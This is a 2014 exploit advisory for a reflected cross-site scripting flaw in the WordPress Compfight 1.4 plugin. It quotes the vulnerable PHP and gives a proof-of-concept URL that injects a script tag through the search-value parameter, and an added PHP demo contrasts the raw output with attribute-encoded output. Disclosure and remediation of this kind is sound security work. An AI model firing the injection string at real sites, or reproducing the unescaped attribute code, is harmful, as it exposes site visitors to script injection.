WordPress Compfight 1.4 Cross Site Scripting
Posted on 12 July 2014
######################
# Exploit Title : Wordpress Compfight 1.4 Authenticated Cross Site Scripting
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://wordpress.org/plugins/easy-banners/
# Software Link : http://downloads.wordpress.org/plugin/compfight.1.4.zip
# Date : 2014-07-03
# Tested on : Windows 7 / Mozilla Firefox
######################

# Location :

http://localhost/wp-content/plugins/compfight/compfight-search.php

######################

# Vulnerable code :

if (!$search_value) {
    $input_text = 'Enter Keyword(s)';
} else {
    $input_text = $search_value;
}

if ($show_title) {
    $output .= '<h3 class="cf_search_title">Compfight</h3>';
    $output .= '<p class="cf_search_subtitle">Locate the visual inspiration<br/>you need. Super fast!</p>';
}

$output .= '<form method="GET" action="" id="cf-form">';
$output .= '<input type="text" name="search-value" id="search-value" value="' . $input_text . '" onClick="javascript:if(this.value==\'Enter Keyword(s)\') { this.value = \'\'; };" />';
$output .= '<input type="submit" name="search" id="search" value="Search" class="button" />';
$output .= '</form>';

$input_text variable not sanitized

######################

Exploit Code:

http://localhost/plugins/compfight/compfight-search.php?search-value='"/><script>alert(1);</script>&search=Search

#####################

Discovered By : Claudio Viviani
                http://www.homelab.it
                info@homelab.it

                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/

#####################
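
Added example (not part of the original advisory and not the plugin's code): the value-attribute sink above rendered without and with output encoding, then parsed to count the <script> elements that result. The function names are hypothetical, and htmlspecialchars() stands in for WordPress's esc_attr() so the file runs without WordPress loaded; it assumes PHP's DOM extension is available.

```php
<?php
// Added example; cf_* names are hypothetical, not from the Compfight plugin.

// Encode a value for use inside a quoted HTML attribute.
// In plugin code running under WordPress, esc_attr() is the usual call.
function cf_attr(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Before: same logic as the advisory's snippet, value concatenated raw.
function cf_input_vulnerable(?string $search_value): string {
    $input_text = !$search_value ? 'Enter Keyword(s)' : $search_value;
    return '<input type="text" name="search-value" id="search-value" value="'
         . $input_text . '" />';
}

// After: identical markup, value encoded at the point of output.
function cf_input_hardened(?string $search_value): string {
    $input_text = !$search_value ? 'Enter Keyword(s)' : $search_value;
    return '<input type="text" name="search-value" id="search-value" value="'
         . cf_attr($input_text) . '" />';
}

// Parse a fragment and report how the browser-side structure comes out:
// the number of <script> elements and the decoded value of the input.
function cf_inspect(string $html): array {
    libxml_use_internal_errors(true);   // silence parser warnings on fragments
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    $input = $doc->getElementsByTagName('input')->item(0);
    return [
        'scripts' => $doc->getElementsByTagName('script')->length,
        'value'   => $input ? $input->getAttribute('value') : null,
    ];
}

// The search-value string taken from the advisory's request URL.
$payload = '\'"/><script>alert(1);</script>';

foreach (['vulnerable' => cf_input_vulnerable($payload),
          'hardened'   => cf_input_hardened($payload)] as $label => $html) {
    $r = cf_inspect($html);
    printf("%-10s scripts=%d value=%s\n", $label, $r['scripts'], var_export($r['value'], true));
    echo "           ", $html, "\n";
}
```

In the hardened rendering the whole submitted string remains the value of the input field; in the raw rendering the attribute ends at the first double quote and the remainder is parsed as markup.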
